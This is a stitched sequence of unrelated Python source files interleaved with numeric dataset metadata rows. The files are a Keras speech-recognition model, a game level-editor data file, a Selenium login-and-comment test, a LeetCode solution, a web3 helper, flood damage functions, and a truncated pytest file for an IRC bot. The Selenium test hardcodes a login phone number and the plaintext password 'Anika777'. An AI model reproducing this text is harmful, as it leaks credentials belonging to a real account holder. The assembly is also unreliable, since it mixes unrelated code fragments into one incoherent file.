        train_model = Model([audio_ipt, y_true, audio_length, label_length], [loss_out])
        train_model.compile(optimizer="adam", loss={"ctc": lambda y_true, y_pred: y_pred})
        base_model = Model(audio_ipt, y_pred)
        self.built(train_model, base_model)

    @staticmethod
    def train(datagenes: list, load_model=None):
        w, h = 800, 200
        max_label_len = 64
        dataset = VoiceDatasetList()
        x_set, y_set = dataset.merge_load(datagenes)
        pymap = PinyinMapper(sil_mode=-1)
        vloader = VoiceLoader(x_set, y_set,
                              batch_size=16,
                              feature_pad_len=w,
                              n_mels=h,
                              max_label_len=max_label_len,
                              pymap=pymap,
                              melf=MelFeature5(),
                              all_train=False)
        model_helper = MCONM(pymap)
        model_helper.compile(feature_shape=(w, h), label_max_string_length=max_label_len,
                             ms_output_size=pymap.max_index + 1)
        if load_model is not None:
            load_model = os.path.abspath(load_model)
            model_helper.load(load_model)
        model_helper.fit(vloader, epoch=-1, save_step=1000, use_ctc=True)

class MPCONM(AcousticModel):
    '''Based on MCONM, an attempt that replaces the parent structure with three
    conv + maxpool layers; all other conditions are the same.
    2019-07-15 00:30:43: on the thchs30 dataset, epoch=82, loss=14; the loss is
    now decreasing only with difficulty. Keep training, and give up if it has
    not converged after epoch > 150.
    '''
    def compile(self, feature_shape=(1024, 200), label_max_string_length=32, ms_output_size=1423):
        audio_ipt = Input(name="audio_input", shape=feature_shape)
        parent_out = self.cnn1d_cell(32, audio_ipt, pool=True)
        parent_out = self.cnn1d_cell(64, parent_out, pool=True)
        parent_out = self.cnn1d_cell(64, parent_out, pool=True)

        layer_h1 = self.conv1d_layers(parent_out, 64, 8)
        layer_h2 = self.cnn1d_cell(64, layer_h1, pool=False)
        layer_h3 = Add()([parent_out, layer_h2])

        layer_h6 = Dropout(0.2)(layer_h3)  # KL, double Dense
        layer_h7 = Dense(256, activation="relu", kernel_initializer="he_normal")(layer_h6)  # TODO: consider adding Attention here
        layer_h7 = Dropout(0.2)(layer_h7)
        layer_h8 = Dense(ms_output_size)(layer_h7)
        y_pred = Activation(activation="softmax")(layer_h8)

        y_true = Input(name='label_inputs', shape=[label_max_string_length], dtype='float32')
        audio_length = Input(name='audio_length', shape=[1], dtype='int64')
        label_length = Input(name='label_length', shape=[1], dtype='int64')
        loss_out = CTC_Batch_Cost()([y_true, y_pred, audio_length, label_length])

        train_model = Model([audio_ipt, y_true, audio_length, label_length], [loss_out])
        train_model.compile(optimizer="adam", loss={"ctc": lambda y_true, y_pred: y_pred})
        base_model = Model(audio_ipt, y_pred)
        self.built(train_model, base_model)

    @staticmethod
    def train(datagenes: list, load_model=None):
        w, h = 1600, 200
        max_label_len = 64
        dataset = VoiceDatasetList()
        x_set, y_set = dataset.merge_load(datagenes)
        pymap = PinyinMapper(sil_mode=-1)
        vloader = VoiceLoader(x_set, y_set,
                              batch_size=16,
                              feature_pad_len=w,
                              n_mels=h,
                              max_label_len=max_label_len,
                              pymap=pymap,
                              divide_feature_len=8,
                              melf=MelFeature5(),
                              all_train=False)
        model_helper = MPCONM(pymap)
        model_helper.compile(feature_shape=(w, h), label_max_string_length=max_label_len,
                             ms_output_size=pymap.max_index + 1)
        if load_model is not None:
            load_model = os.path.abspath(load_model)
            model_helper.load(load_model)
        model_helper.fit(vloader, epoch=-1, save_step=100, use_ctc=True)

class MPBCONM(AcousticModel):
    '''MPCONM with BatchNorm added.'''
    def compile(self, feature_shape=(1024, 200), label_max_string_length=32, ms_output_size=1423):
        audio_ipt = Input(name="audio_input", shape=feature_shape)
        parent_out = self.cnn1d_cell(32, audio_ipt, pool=True)
        parent_out = self.cnn1d_cell(64, parent_out, pool=True)
        parent_out = self.cnn1d_cell(64, parent_out, pool=True)

        layer_h1 = self.conv1d_layers(parent_out, 64, 8, batch_norm=True)
        layer_h2 = self.cnn1d_cell(64, layer_h1, pool=False)
        layer_h3 = Add()([parent_out, layer_h2])

        layer_h6 = Dropout(0.2)(layer_h3)  # KL, double Dense
        layer_h7 = Dense(256, activation="relu", kernel_initializer="he_normal")(layer_h6)  # TODO: consider adding Attention here
        layer_h7 = Dropout(0.2)(layer_h7)
        layer_h8 = Dense(ms_output_size)(layer_h7)
        y_pred = Activation(activation="softmax")(layer_h8)

        y_true = Input(name='label_inputs', shape=[label_max_string_length], dtype='float32')
        audio_length = Input(name='audio_length', shape=[1], dtype='int64')
        label_length = Input(name='label_length', shape=[1], dtype='int64')
        loss_out = CTC_Batch_Cost()([y_true, y_pred, audio_length, label_length])

        train_model = Model([audio_ipt, y_true, audio_length, label_length], [loss_out])
        train_model.compile(optimizer="adam", loss={"ctc": lambda y_true, y_pred: y_pred})
        base_model = Model(audio_ipt, y_pred)
        self.built(train_model, base_model)

    @staticmethod
    def train(datagenes: list, load_model=None):
        w, h = 1600, 200
        max_label_len = 64
        dataset = VoiceDatasetList()
        x_set, y_set = dataset.merge_load(datagenes)
        pymap = PinyinMapper(sil_mode=-1)
        vloader = VoiceLoader(x_set, y_set,
                              batch_size=16,
                              feature_pad_len=w,
                              n_mels=h,
                              max_label_len=max_label_len,
                              pymap=pymap,
                              divide_feature_len=8,
                              melf=MelFeature5(),
                              all_train=False)
        model_helper = MPBCONM(pymap)
        model_helper.compile(feature_shape=(w, h), label_max_string_length=max_label_len,
                             ms_output_size=pymap.max_index + 1)
        if load_model is not None:
            load_model = os.path.abspath(load_model)
            model_helper.load(load_model)
        model_helper.fit(vloader, epoch=-1, save_step=1000, use_ctc=True)
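
# Illustrative training invocation for the models above. The data-generator
# objects that populate `datagenes` (for example a thchs30 loader) live
# elsewhere in ASRFrame, so the call is left commented as a sketch:
# MPBCONM.train([<thchs30 datagene>], load_model=None)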
| 42.364103 | 123 | 0.622806 | 1,059 | 8,261 | 4.543909 | 0.148253 | 0.029925 | 0.027431 | 0.037406 | 0.86783 | 0.863051 | 0.863051 | 0.854946 | 0.854946 | 0.854946 | 0 | 0.045946 | 0.272848 | 8,261 | 194 | 124 | 42.582474 | 0.755119 | 0.047936 | 0 | 0.830986 | 0 | 0 | 0.034969 | 0 | 0 | 0 | 0 | 0.010309 | 0 | 1 | 0.042254 | false | 0 | 0.056338 | 0 | 0.119718 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7771b9af379f2d0d88fadf289ca6e0bf5a6885a8 | 4,438 | py | Python | pirates/leveleditor/worldData/shipQueenAnnesRevenge.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | [
"BSD-3-Clause"
] | 81 | 2018-04-08T18:14:24.000Z | 2022-01-11T07:22:15.000Z | pirates/leveleditor/worldData/shipQueenAnnesRevenge.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | [
"BSD-3-Clause"
] | 4 | 2018-09-13T20:41:22.000Z | 2022-01-08T06:57:00.000Z | pirates/leveleditor/worldData/shipQueenAnnesRevenge.py | Willy5s/Pirates-Online-Rewritten | 7434cf98d9b7c837d57c181e5dabd02ddf98acb7 | [
"BSD-3-Clause"
] | 26 | 2018-05-26T12:49:27.000Z | 2021-09-11T09:11:59.000Z | from pandac.PandaModules import Point3, VBase3, Vec4, Vec3
objectStruct = {'Objects': {'1302550960.6jubutler': {'Type': 'Ship Part','Name': 'shipQueenAnne','Category': "55: Queen Anne's Revenge",'File': '','Flagship': False,'LogoOverride': '-1: Default','Objects': {'1302551043.33jubutler': {'Type': 'Spawn Node','AnimSet': 'default','AuraFX': 'None','Hpr': Point3(0.0, 0.0, 0.0),'Min Population': '1','Patrol Radius': '12.0000','Pause Chance': '100','Pause Duration': '30','Pos': Point3(1.4, -20.734, 25.053),'PoseAnim': '','PoseFrame': '','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'VoodooZombie T4','Start State': 'Patrol','StartFrame': '0','Team': 'default','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','Visual': {'Color': (0, 0, 0.65, 1),'Model': 'models/misc/smiley'},'spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0},'1302551224.75jubutler': {'Type': 'Movement Node','Hpr': Point3(0.0, 0.0, 0.0),'Pause Chance': 100,'Pause Duration': 30,'Pos': Point3(-11.024, -45.302, 24.596),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.65, 0, 0, 1),'Model': 'models/misc/smiley'}},'1302551245.21jubutler': {'Type': 'Movement Node','Hpr': Point3(0.0, 0.0, 0.0),'Pause Chance': 100,'Pause Duration': 30,'Pos': Point3(7.606, -45.433, 24.594),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.65, 0, 0, 1),'Model': 'models/misc/smiley'}},'1302551263.39jubutler': {'Type': 'Movement Node','Hpr': Point3(0.0, 0.0, 0.0),'Pause Chance': '100','Pause Duration': '30','Pos': Point3(-10.083, 6.624, 25.561),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.65, 0, 0, 1),'Model': 'models/misc/smiley'}},'1302551267.54jubutler': {'Type': 'Movement Node','Hpr': Point3(0.0, 0.0, 0.0),'Pause Chance': '100','Pause Duration': '30','Pos': Point3(10.469, 5.193, 25.707),'Scale': VBase3(1.0, 1.0, 1.0),'VisSize': '','Visual': {'Color': (0.65, 0, 0, 1),'Model': 'models/misc/smiley'}},'1302561022.57jloehrle': {'Type': 'Spawn Node','AnimSet': 'default','AuraFX': 'None','Hpr': VBase3(-177.313, 0.0, 0.0),'Min Population': '1','Patrol Radius': '12.0000','Pause Chance': '100','Pause Duration': '30','Pos': Point3(-1.15, 30.476, 27.427),'PoseAnim': '','PoseFrame': '','PropFXLeft': 'None','PropFXRight': 'None','PropLeft': 'None','PropRight': 'None','Scale': VBase3(1.0, 1.0, 1.0),'Spawnables': 'VoodooZombie T4','Start State': 'Patrol','StartFrame': '0','Team': 'default','TrailFX': 'None','TrailLeft': 'None','TrailRight': 'None','VisSize': '','Visual': {'Color': (0, 0, 0.65, 1),'Model': 'models/misc/smiley'},'spawnTimeBegin': 0.0,'spawnTimeEnd': 0.0}},'Respawns': True,'StyleOverride': '-1: Default','Team': 'Player','VisSize': '','Visual': {'Model': ['models/shipparts/interceptorL1-geometry_High', 'models/shipparts/interceptorL1-collisions']}}},'Node Links': [['1302551267.54jubutler', '1302551245.21jubutler', 'Bi-directional'], ['1302551267.54jubutler', '1302551263.39jubutler', 'Bi-directional'], ['1302551267.54jubutler', '1302551043.33jubutler', 'Bi-directional'], ['1302551245.21jubutler', '1302551224.75jubutler', 'Bi-directional'], ['1302551245.21jubutler', '1302551043.33jubutler', 'Bi-directional'], ['1302551224.75jubutler', '1302551263.39jubutler', 'Bi-directional'], ['1302551224.75jubutler', '1302551043.33jubutler', 'Bi-directional'], ['1302551263.39jubutler', '1302551043.33jubutler', 'Bi-directional'], ['1302561022.57jloehrle', '1302551263.39jubutler', 'Bi-directional'], ['1302561022.57jloehrle', '1302551267.54jubutler', 'Bi-directional']],'Layers': 
{},'ObjectIds': {'1302550960.6jubutler': '["Objects"]["1302550960.6jubutler"]','1302551043.33jubutler': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302551043.33jubutler"]','1302551224.75jubutler': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302551224.75jubutler"]','1302551245.21jubutler': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302551245.21jubutler"]','1302551263.39jubutler': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302551263.39jubutler"]','1302551267.54jubutler': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302551267.54jubutler"]','1302561022.57jloehrle': '["Objects"]["1302550960.6jubutler"]["Objects"]["1302561022.57jloehrle"]'}}
extraInfo = {'camPos': Point3(-123.069, -59.1584, 128.29),'camHpr': VBase3(-67.7526, -39.2735, 0),'focalLength': 1.39951908588,'skyState': 2,'fog': 0} | 1,479.333333 | 4,228 | 0.667418 | 557 | 4,438 | 5.315978 | 0.2693 | 0.027018 | 0.024316 | 0.021614 | 0.436339 | 0.436339 | 0.436339 | 0.436339 | 0.406619 | 0.406619 | 0 | 0.210741 | 0.060162 | 4,438 | 3 | 4,229 | 1,479.333333 | 0.499161 | 0 | 0 | 0 | 0 | 0 | 0.614553 | 0.274386 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
77b40f8fba4a27221cb3aa7619e365b709fcc849 | 1,939 | py | Python | text.py | anatolynord/test_python | 2314e7847649277f3dee5db5d4422a6b6586d654 | [
"Apache-2.0"
] | null | null | null | text.py | anatolynord/test_python | 2314e7847649277f3dee5db5d4422a6b6586d654 | [
"Apache-2.0"
] | null | null | null | text.py | anatolynord/test_python | 2314e7847649277f3dee5db5d4422a6b6586d654 | [
"Apache-2.0"
] | null | null | null |
def test_addcomment(self):
    self.driver.get("https://coredemo.apdow.net/")
    self.driver.set_window_size(2490, 1376)
    self.driver.find_element(By.LINK_TEXT, "Sign In").click()
    self.driver.find_element(By.NAME, "email").click()
    self.driver.find_element(By.NAME, "email").send_keys("79210120011")
    self.driver.find_element(By.NAME, "password").send_keys("Anika777")
    self.driver.find_element(By.CSS_SELECTOR, ".green").click()
    self.driver.find_element(By.LINK_TEXT, "Свежее").click()
    self.driver.find_element(By.CSS_SELECTOR, ".ng-tns-c125-12 > .lazyautosizes").click()
    self.driver.find_element(By.CSS_SELECTOR, ".ng-invalid").click()
    self.driver.find_element(By.CSS_SELECTOR, ".ng-dirty").send_keys("Test_1")
    self.driver.find_element(By.CSS_SELECTOR, ".fa-paper-plane > path").click()
    self.driver.find_element(By.CSS_SELECTOR, ".ng-tns-c22-3 .ready").click()
    self.driver.find_element(By.LINK_TEXT, "Выйти").click()
...
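
# A minimal, hypothetical harness for the method above. The original file ships
# only the bare test method, so the imports, class wrapper, and driver
# setup/teardown here are assumptions rather than part of the source.
import unittest
from selenium import webdriver
from selenium.webdriver.common.by import By  # locator class used by the steps above

class TestAddComment(unittest.TestCase):
    def setUp(self):
        self.driver = webdriver.Chrome()

    def tearDown(self):
        self.driver.quit()

    # Reuse the module-level method above as a test case.
    test_addcomment = test_addcomment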
| 49.717949 | 89 | 0.716864 | 288 | 1,939 | 4.631944 | 0.173611 | 0.209895 | 0.251874 | 0.377811 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0.035449 | 0.097989 | 1,939 | 38 | 90 | 51.026316 | 0.727273 | 0 | 0 | 0.967742 | 0 | 0 | 0.194215 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.064516 | false | 0.064516 | 0 | 0 | 0.064516 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 11 |
77de150d02290f4f3b617a6485d67dcd1b4034b1 | 662 | py | Python | leet/array/findBuildings.py | monishshah18/python-cp-cheatsheet | a5514b08816959de1198156f7764c54a7a585f20 | [
"Apache-2.0"
] | null | null | null | leet/array/findBuildings.py | monishshah18/python-cp-cheatsheet | a5514b08816959de1198156f7764c54a7a585f20 | [
"Apache-2.0"
] | null | null | null | leet/array/findBuildings.py | monishshah18/python-cp-cheatsheet | a5514b08816959de1198156f7764c54a7a585f20 | [
"Apache-2.0"
] | 1 | 2021-09-22T04:41:47.000Z | 2021-09-22T04:41:47.000Z | # LeetCode supplies List and deque implicitly; imported here so the file runs standalone.
from typing import List
from collections import deque

class Solution:
    def findBuildings(self, heights: List[int]) -> List[int]:
        rtn = deque()
        maxHeight = float('-inf')
        # Scan right to left, keeping each index taller than everything after it.
        for i in range(len(heights) - 1, -1, -1):
            if heights[i] > maxHeight:
                maxHeight = heights[i]
                rtn.appendleft(i)
        return rtn

# Alternate version: assumes non-negative heights, so 0 works as the initial maximum.
class Solution:
    def findBuildings(self, heights: List[int]) -> List[int]:
        rtn = deque()
        maxHeight = 0
        for i in range(len(heights) - 1, -1, -1):
            if heights[i] > maxHeight:
                maxHeight = heights[i]
                rtn.appendleft(i)
        return rtn
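
# A small worked check for the solutions above: a building sees the ocean
# exactly when it is taller than every building to its right.
if __name__ == '__main__':
    print(list(Solution().findBuildings([4, 2, 3, 1])))  # [0, 2, 3]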
| 27.583333 | 62 | 0.478852 | 71 | 662 | 4.464789 | 0.323944 | 0.088328 | 0.100946 | 0.182965 | 0.971609 | 0.971609 | 0.971609 | 0.971609 | 0.971609 | 0.971609 | 0 | 0.017767 | 0.404834 | 662 | 24 | 63 | 27.583333 | 0.786802 | 0 | 0 | 0.888889 | 0 | 0 | 0.006033 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7ad19c30d14f423e29b714fc9295765572637b54 | 194 | py | Python | origin-bridge/tests/helpers/eth_utils.py | rgm93/CleanersDApp | 6af29884110023b29056e1c4126cc021ed5947cc | [
"MIT"
] | 10 | 2018-03-22T22:13:26.000Z | 2018-05-29T06:29:17.000Z | origin-bridge/tests/helpers/eth_utils.py | rgm93/CleanersDApp | 6af29884110023b29056e1c4126cc021ed5947cc | [
"MIT"
] | 64 | 2018-03-30T02:20:11.000Z | 2018-06-22T01:21:41.000Z | origin-bridge/tests/helpers/eth_utils.py | rgm93/CleanersDApp | 6af29884110023b29056e1c4126cc021ed5947cc | [
"MIT"
] | 5 | 2018-07-08T01:56:41.000Z | 2018-09-29T15:01:29.000Z | from web3 import Web3
sample_eth_address = 562046206989085878832492993516240920558397288279
def str_eth(numeric_eth_address):
    return Web3.toChecksumAddress(hex(int(numeric_eth_address)))
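
# Quick usage sketch using the module's own sample value (requires web3):
if __name__ == '__main__':
    print(str_eth(sample_eth_address))  # prints the EIP-55 checksummed address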
| 24.25 | 69 | 0.850515 | 22 | 194 | 7.181818 | 0.636364 | 0.189873 | 0.21519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.289773 | 0.092784 | 194 | 7 | 70 | 27.714286 | 0.607955 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
24809a1b2571bb16267583310a862fb622f2398c | 43 | py | Python | challenges/up_and_down.py | P-py/Solving-PythonPrinciples | 6dd805e258794422483af5aaf1a3745bf6a00e8d | [
"MIT"
] | null | null | null | challenges/up_and_down.py | P-py/Solving-PythonPrinciples | 6dd805e258794422483af5aaf1a3745bf6a00e8d | [
"MIT"
] | null | null | null | challenges/up_and_down.py | P-py/Solving-PythonPrinciples | 6dd805e258794422483af5aaf1a3745bf6a00e8d | [
"MIT"
] | null | null | null | def up_down(num):
    return (num - 1, num + 1)
| 21.5 | 25 | 0.627907 | 9 | 43 | 2.888889 | 0.666667 | 0.307692 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.057143 | 0.186047 | 43 | 2 | 25 | 21.5 | 0.685714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7
7087697cd76b58e855312e0907298d726a551e72 | 78 | py | Python | Python/Math/integers_come_in_all_sizes.py | rho2/HackerRank | 4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266 | [
"MIT"
] | null | null | null | Python/Math/integers_come_in_all_sizes.py | rho2/HackerRank | 4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266 | [
"MIT"
] | null | null | null | Python/Math/integers_come_in_all_sizes.py | rho2/HackerRank | 4d9cdfcabeb20212db308d8e4f2ac1b8ebf7d266 | [
"MIT"
] | null | null | null | # Ported from Python 2 (print statement, raw_input) so it runs on Python 3:
print(int(input()) ** int(input()) + int(input()) ** int(input()))
5610e9d27ba2a2308714a052b9543ce1b06a086f | 1,412 | py | Python | damagefunctions/damagefunctions.py | Pranavesh-Panakkal/damagefunctions | d8d701d401e3ddef46c216f981c5a5a4fd9c4679 | [
"MIT"
] | null | null | null | damagefunctions/damagefunctions.py | Pranavesh-Panakkal/damagefunctions | d8d701d401e3ddef46c216f981c5a5a4fd9c4679 | [
"MIT"
] | null | null | null | damagefunctions/damagefunctions.py | Pranavesh-Panakkal/damagefunctions | d8d701d401e3ddef46c216f981c5a5a4fd9c4679 | [
"MIT"
] | null | null | null |
class damagefunctions:
    @staticmethod
    def pistrika_US_2010_block_group(water_depth_m, velocity_ms):
"""Damage fraction [0-1] from water depth (m) and flow velocity (m/s) using Pistrika and Jonkman (2010) results for block group
Parameters
----------
water_depth_m : float, (default : None)
Water depth in meters
velocity_ms : float, (default : None)
Flow velocity in m/s
Returns
-------
Damage ratio between 0 and 1.
References
----------
    * [Pistrika and Jonkman (2010)](https://link.springer.com/article/10.1007/s11069-009-9476-y)
"""
return 0.422+0.075*water_depth_m*velocity_ms**0.682
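
    # Added worked example (illustrative): 2 m of water moving at 1.5 m/s gives
    # 0.422 + 0.075 * 2 * 1.5 ** 0.682 ≈ 0.62, i.e. roughly 62% damage.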
    @staticmethod
    def pistrika_US_2010_block(water_depth_m, velocity_ms):
"""Damage fraction [0-1] from water depth (m) and flow velocity (m/s) using Pistrika and Jonkman (2010) results for block
Parameters
----------
water_depth_m : float, (default : None)
Water depth in meters
velocity_ms : float, (default : None)
Flow velocity in m/s
Returns
-------
Damage ratio between 0 and 1.
References
----------
    * [Pistrika and Jonkman (2010)](https://link.springer.com/article/10.1007/s11069-009-9476-y)
"""
return 0.457+0.063*water_depth_m*velocity_ms**0.654 | 40.342857 | 136 | 0.575779 | 178 | 1,412 | 4.426966 | 0.303371 | 0.126904 | 0.111675 | 0.096447 | 0.936548 | 0.880711 | 0.824873 | 0.824873 | 0.824873 | 0.824873 | 0 | 0.093306 | 0.3017 | 1,412 | 35 | 137 | 40.342857 | 0.705882 | 0.615439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | false | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
561e01b79aa7797775b3f742c2772e0af8591677 | 42,647 | py | Python | hallo/test/modules/server_control/test_connect_irc.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2018-05-19T22:27:20.000Z | 2018-05-19T22:27:20.000Z | hallo/test/modules/server_control/test_connect_irc.py | joshcoales/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 75 | 2015-09-26T18:07:18.000Z | 2022-01-04T07:15:11.000Z | hallo/test/modules/server_control/test_connect_irc.py | SpangleLabs/Hallo | 17145d8f76552ecd4cbc5caef8924bd2cf0cbf24 | [
"MIT"
] | 1 | 2021-04-10T12:02:47.000Z | 2021-04-10T12:02:47.000Z | import threading
from hallo.events import EventMessage
from hallo.server import Server
from hallo.server_irc import ServerIRC
from hallo.user_group import UserGroup
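
# Minimal helper sketch (added, not part of the original file): every test below
# repeats the same scan for the newly created server; a shared helper like this
# would remove that duplication. It assumes the hallo fixture shape the tests use.
def _find_new_server(test_hallo) -> ServerIRC:
    assert len(test_hallo.server_list) == 2, "Incorrect number of servers in hallo instance."
    for server in test_hallo.server_list:
        if server is not test_hallo.test_server:
            return server
    raise AssertionError("New server wasn't found.")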
def test_connect_specify_irc(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:80",
)
)
# Ensure correct response is given
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
def test_port_in_url(hallo_getter):
test_hallo = hallo_getter({"server_control"})
test_port = 80
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com:" + str(test_port),
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.get_server_port() == test_port, "Port incorrect"
def test_port_by_argument(hallo_getter):
test_hallo = hallo_getter({"server_control"})
test_port = 80
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc www.example.com server_port=" + str(test_port),
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance."
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.get_server_port() == test_port, "Port incorrect"
def test_address_in_argument(hallo_getter):
test_hallo = hallo_getter({"server_control"})
test_url = "www.example.com"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc " + test_url + " server_port=80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance"
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.server_address == test_url, "Address incorrect"
def test_address_by_argument(hallo_getter):
test_hallo = hallo_getter({"server_control"})
test_url = "www.example.com"
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_hallo.test_server,
test_hallo.test_chan,
test_hallo.test_user,
"connect irc server_address=" + test_url + " server_port=80",
)
)
# Ensure correct response
data = test_hallo.test_server.get_send_data(1, test_hallo.test_chan, EventMessage)
assert (
"connected to new irc server" in data[0].text.lower()
), "Incorrect output: " + str(data[0].text)
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance"
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.server_address == test_url, "Address incorrect"
def test_inherit_port(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Set things up
test_port = 80
test_serv_irc = ServerIRC(test_hallo)
test_serv_irc.prefix = ""
test_serv_irc.name = "test_serv_irc"
test_serv_irc.server_port = test_port
test_chan_irc = test_serv_irc.get_channel_by_address(
"test_chan".lower(), "test_chan"
)
test_user_irc = test_serv_irc.get_user_by_address(
"test_user".lower(), "test_user"
)
# Run command
test_hallo.function_dispatcher.dispatch(
EventMessage(
test_serv_irc, test_chan_irc, test_user_irc, "connect irc example.com"
)
)
# Can't check response because I'm using a ServerIRC instead of a ServerMock
# Find the right server
assert (
len(test_hallo.server_list) == 2
), "Incorrect number of servers in hallo instance"
right_server = None # type: ServerIRC
for server in test_hallo.server_list:
if server is not test_hallo.test_server:
right_server = server
assert right_server is not None, "New server wasn't found."
assert right_server.server_port == test_port, "Port incorrect"
def test_non_int_port_failure(hallo_getter):
test_hallo = hallo_getter({"server_control"})
# Run command
